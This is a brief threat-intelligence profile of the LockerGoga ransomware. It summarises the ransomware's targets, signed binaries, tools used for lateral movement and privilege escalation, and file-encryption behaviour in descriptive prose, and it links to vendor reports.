LockerGoga, also known as GoGalocker, is a ransomware variant first observed in early 2019. It has targeted industrial and manufacturing sectors, in addition to a wide range of other organizations. The threat actors digitally sign the ransomware with legitimate certificates, assisting them in avoiding detection. The initial infection vector is unknown, however the group uses a number of tools to gain further access into the targeted network. They then map out the network and steal credentials that can give them access to additional systems and elevate their privileges. PowerShell commands are used to download and run two pieces of shellcode. Once compiled, the second shellcode allows the malware to communicate with the threat actor. In addition to PowerShell, the threat actors use PuTTY to create SSH sessions, Mimikatz to escalate privileges, and Wolf-x-full to manage and gather information from a targeted system. Depending on the command used, the ransomware can encrypt all file types or specific file types such as Word, Excel, PowerPoint, and PDF. When encrypting files, it will append the .locked extension to the processed files.

Technical Details and Reporting

  • Bleeping Computer provides details of this ransomware variant here.

  • CIS also provides a Security Primer here.

  • UPDATE 04/09/2019: Securonix Threat Research Team provides a summary, recommendations, predictive indicators, and security analytics.

  • UPDATE 7/23/2019: Symantec reports on LockerGoga capabilities and activities in their report “Targeted Ransomware: Proliferating Menace Threatens Organizations.”